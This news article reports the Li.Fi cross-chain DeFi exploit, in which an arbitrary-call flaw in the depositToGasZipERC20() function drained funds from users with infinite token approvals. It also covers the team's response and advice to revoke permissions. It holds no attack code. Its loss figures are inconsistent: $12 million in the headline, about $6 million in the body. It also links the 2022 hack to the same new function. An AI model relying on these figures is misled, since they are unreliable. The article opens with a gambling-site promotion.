LI.FI Crypto Aggregator Suffers $12 Million Drain

This article comes to you with the generous support of Betplay.io. Discover the excitement and rewards that await you at Betplay.io with a 100% welcome bonus and 10% weekly cashback!

Li.Fi Protocol Suffers Significant Hack

Cross-chain DeFi protocol Li.Fi has been exploited, resulting in a substantial loss of cryptocurrency estimated at $12 million, affecting approximately 153 wallets. The breach primarily affected users who had set "infinite approvals" on their accounts. 

The attack exploited a vulnerability in the depositToGasZipERC20() function of the Li.Fi bridge, allowing a hacker to withdraw approved tokens through a method known as "call injection." This flaw, introduced only five days before the attack, enabled the hacker to manipulate user-controlled data to execute unauthorized transactions, resulting in the theft of approximately $6 million in Ethereum (ETH) and various stablecoins including USDC, USDT, and DAI.

The Li.Fi team quickly responded on social media, urging users to avoid interacting with any Li.Fi-powered applications and to use a secluded revoke website to revoke permissions immediately. Security firm Decurity identified the root cause as an arbitrary call vulnerability in the depositToGasZipERC20() function. 

The team discovered four additional security breaches following the initial exploit. Users were advised to use revoke.cash to check and revoke any compromised permissions. Blockchain security firms CertiK and Peckshield provided ongoing analysis and updates.

This incident echoes a similar exploit in 2022, where a bug in the swapping feature led to $600,000 in losses. Peckshield noted that the recent hack involved the same vulnerability as the previous one, emphasizing the manipulation of the depositToGasZipERC20() function. 

The 2022 LI.FI protocol hack resulted in $600,000 stolen from 29 wallets. According to the team in a post-mortem report, the bug was fixed, and all affected users were reimbursed. 

A wallet containing drained funds used to control over $5.8 million in ETH and substantial stablecoins, but then sent the funds out to different addresses until its balance dropped to zero. Li.Fi has assured users that the exploit is contained and funds are no longer at risk, while they continue their investigation and work on additional security measures to prevent future breaches.

In a report published Thursday, LI.FI attributed the exploit to "an individual human error in overseeing the deployment process" during a smart contract update. The team acknowledged that the error left the protocol vulnerable to malicious actors.

Despite the breach, LI.FI's team acted swiftly, activating an "incident response plan" to contain the threat. They successfully disabled the vulnerable facet across all chains, preventing further unauthorized access.  The team is actively working with law enforcement and security firms to recover user funds.